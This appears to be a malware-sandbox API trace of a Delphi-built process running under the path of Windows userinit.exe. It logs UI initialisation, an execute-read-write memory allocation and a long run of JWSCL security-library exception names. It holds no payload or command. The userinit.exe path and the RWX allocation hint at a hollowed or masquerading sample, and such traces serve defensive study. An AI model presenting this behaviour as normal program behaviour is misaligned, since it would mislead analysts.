[0179.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0179.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0179.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0179.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0179.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0179.657] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0179.657] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0179.657] GetDC (hWnd=0x0) returned 0xed010836
[0179.657] GetDeviceCaps (hdc=0xed010836, index=90) returned 96
[0179.657] ReleaseDC (hWnd=0x0, hDC=0xed010836) returned 1
[0179.657] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0179.657] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x29a9a60, dwData=0x2a7156c) returned 1
[0179.658] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x20f4eb, fWinIni=0x0 | out: pvParam=0x20f4eb) returned 1
[0179.658] CreateFontIndirectA (lplf=0x20f4eb) returned 0x3f0a0873
[0179.658] GetObjectA (in: h=0x3f0a0873, c=60, pv=0x20f2dc | out: pv=0x20f2dc) returned 60
[0179.658] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x20f397, fWinIni=0x0 | out: pvParam=0x20f397) returned 1
[0179.658] CreateFontIndirectA (lplf=0x20f473) returned 0x7c0a071a
[0179.658] GetObjectA (in: h=0x7c0a071a, c=60, pv=0x20f2dc | out: pv=0x20f2dc) returned 60
[0179.658] CreateFontIndirectA (lplf=0x20f437) returned 0x630a0898
[0179.658] GetObjectA (in: h=0x630a0898, c=60, pv=0x20f2dc | out: pv=0x20f2dc) returned 60
[0179.658] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0179.659] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20f44b, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0179.659] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x20f44b | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0179.659] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x110000
[0179.659] GetKeyboardLayoutList (in: nBuff=64, lpList=0x20f3cc | out: lpList=0x20f3cc) returned 1
[0179.660] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0179.660] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0179.661] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d7b0000
[0179.661] GetProcAddress (hModule=0x6d7b0000, lpProcName="InitializeFlatSB") returned 0x6d7e266f
[0179.661] GetProcAddress (hModule=0x6d7b0000, lpProcName="UninitializeFlatSB") returned 0x6d7e2542
[0179.661] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollProp") returned 0x6d7e1d29
[0179.661] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollProp") returned 0x6d7e238d
[0179.661] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7e20c9
[0179.661] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d7e1fdb
[0179.661] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollRange") returned 0x6d7e1e8d
[0179.661] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d7e1f0f
[0179.661] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_GetScrollPos") returned 0x6d7e1ccd
[0179.662] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollPos") returned 0x6d7e216d
[0179.662] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7e22be
[0179.662] GetProcAddress (hModule=0x6d7b0000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7e21e2
[0179.662] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0179.662] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0179.662] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0179.662] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0179.662] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0179.662] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0179.662] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0179.662] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0179.662] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0179.662] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0179.663] LoadStringA (in: hInstance=0x2950000, uID=0xff59, lpBuffer=0x20f12c, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0179.663] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0179.663] LoadStringA (in: hInstance=0x2950000, uID=0xff5a, lpBuffer=0x20f12c, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0179.663] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0179.663] LoadStringA (in: hInstance=0x2950000, uID=0xff5b, lpBuffer=0x20f12c, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0179.663] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0179.663] LoadStringA (in: hInstance=0x2950000, uID=0xff5c, lpBuffer=0x20f12c, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0179.663] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0179.663] SetErrorMode (uMode=0x8000) returned 0x1
[0179.663] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6d790000
[0179.665] SetErrorMode (uMode=0x1) returned 0x8000
[0179.665] GetProcAddress (hModule=0x6d790000, lpProcName="OleCreatePropertyFrame") returned 0x6d7920ea
[0179.665] GetProcAddress (hModule=0x6d790000, lpProcName="OleCreateFontIndirect") returned 0x6d7920b7
[0179.665] GetProcAddress (hModule=0x6d790000, lpProcName="OleCreatePictureIndirect") returned 0x6d7920c8
[0179.665] GetProcAddress (hModule=0x6d790000, lpProcName="OleLoadPicture") returned 0x6d7920d9
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x2a3fa98*="EJwsclUnsupportedException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x2a3fa80*="EJwsclPIDException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x2a3fa68*="EJwsclJwShellExecuteException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x2a3fa50*="EJwsclShellExecuteException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x2a3fa38*="EJwsclElevationException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x2a3fa20*="EJwsclAbortException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x2a3fa08*="EJwsclSuRunErrorException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x2a3f9f0*="EJwsclElevateProcessException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x2a3f9d8*="EJwsclCertApiException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x2a3f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x2a3f9a8*="EJwsclInvalidStartupInfo") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x2a3f990*="EJwsclFirewallNoExceptionsException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x2a3f978*="EJwsclFirewallInactiveException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x2a3f960*="EJwsclFirewallDelRuleException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x2a3f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x2a3f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x2a3f918*="EJwsclFirewallAddRuleException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a3f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a3f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a3f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a3f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a3f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a3f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a3f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a3f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x2a3f840*="EJwsclGetFWStateException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x2a3f828*="EJwsclSetFWStateException") returned 1
[0179.666] SysReAllocStringLen (in: pbstr=0x2a3f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x2a3f810*="EJwsclFirewallProfileInitException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x2a3f7f8*="EJwsclFirewallInitException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x2a3f7e0*="EJwsclGenericFirewallException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x2a3f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x2a3f7b0*="EJwsclInvalidRegistryPath") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x2a3f798*="EJwsclEndOfStream") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x2a3f780*="EJwsclClassTypeMismatch") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x2a3f768*="EJwsclInvalidHandle") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x2a3f750*="EJwsclInvalidIndex") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x2a3f738*="EJwsclInvalidSession") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x2a3f720*="EJwsclMissingEvent") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x2a3f708*="EJwsclInvalidPointerType") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x2a3f6f0*="EJwsclCreateProcessFailed") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x2a3f6d8*="EJwsclNilPointer") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x2a3f6c0*="EJwsclUnimplemented") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x2a3f6a8*="EJwsclInitWellKnownException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x2a3f690*="EJwsclKeyApiException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x2a3f678*="EJwsclKeyException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x2a3f660*="EJwsclHashApiException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x2a3f648*="EJwsclHashException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x2a3f630*="EJwsclCSPApiException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x2a3f618*="EJwsclCSPException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x2a3f600*="EJwsclTerminalSessionException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x2a3f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x2a3f5d0*="EJwsclTerminalServiceException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x2a3f5b8*="EJwsclTerminalServerConnectException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x2a3f5a0*="EJwsclTerminalServerException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x2a3f588*="EJwsclCryptUnsupportedException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x2a3f570*="EJwsclCryptApiException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x2a3f558*="EJwsclCryptException") returned 1
[0179.667] SysReAllocStringLen (in: pbstr=0x2a3f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x2a3f540*="EJwsclOSError") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x2a3f528*="EJwsclResourceInitFailed") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x2a3f510*="EJwsclResourceUnequalCount") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x2a3f4f8*="EJwsclResourceNotFound") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x2a3f4e0*="EJwsclResourceException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x2a3f4c8*="EJwsclFailedAddACE") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x2a3f4b0*="EJwsclUnsupportedACE") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x2a3f498*="EJwsclOpenWindowStationException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x2a3f480*="EJwsclWindowStationException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x2a3f468*="EJwsclCloseDesktopException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x2a3f450*="EJwsclCreateDesktopException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x2a3f438*="EJwsclOpenDesktopException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x2a3f420*="EJwsclDesktopException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x2a3f408*="EJwsclSACLAccessDenied") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x2a3f3f0*="EJwsclAccessDenied") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x2a3f3d8*="EJwsclLSAException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x2a3f3c0*="ESetOwnerException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x2a3f3a8*="ESetSecurityException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x2a3f390*="EJwsclInvalidParentDescriptor") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x2a3f378*="EJwsclInvalidKeyPath") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x2a3f360*="EJwsclInvalidGenericAccessMask") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x2a3f348*="EJwsclAdaptSecurityInfoException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x2a3f330*="EJwsclThreadException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x2a3f318*="EJwsclInvalidObjectException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x2a3f300*="EJwsclSecurityObjectException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x2a3f2e8*="EJwsclHashMismatch") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x2a3f2d0*="EJwsclStreamHashException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x2a3f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x2a3f2a0*="EJwsclStreamSizeException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x2a3f288*="EJwsclStreamException") returned 1
[0179.668] SysReAllocStringLen (in: pbstr=0x2a3f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x2a3f270*="EJwsclNoSuchLogonSession") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x2a3f258*="EJwsclInvalidFlagsException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x2a3f240*="EJwsclProcessNotFound") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x2a3f228*="EJwsclInvalidParameterException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x2a3f210*="EJwsclInvalidPathException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x2a3f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x2a3f1e0*="EJwsclInvalidRevision") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x2a3f1c8*="EJwsclInvalidAceMismatch") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x2a3f1b0*="EJwsclRevisionMismatchException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x2a3f198*="EJwsclInvalidACEException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x2a3f180*="EJwsclReadOnlyPropertyException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x2a3f168*="EJwsclDuplicateListEntryException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x2a3f150*="EJwsclIndexOutOfBoundsException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x2a3f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x2a3f120*="EJwsclInvalidKnownSIDException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x2a3f108*="EJwsclInvalidComputer") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x2a3f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x2a3f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x2a3f0c0*="EJwsclInvalidSIDException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x2a3f0a8*="EJwsclInvalidSecurityListException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x2a3f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x2a3f078*="EJwsclEmptyACLException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x2a3f060*="EJwsclNILParameterException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x2a3f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x2a3f030*="EJwsclInvalidObjectArrayException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x2a3f018*="EJwsclProcessIdNotAvailable") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x2a3f000*="EJwsclWinCallFailedException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x2a3efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0179.669] SysReAllocStringLen (in: pbstr=0x2a3efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x2a3efd0*="EJwsclNotImplementedException") returned 1
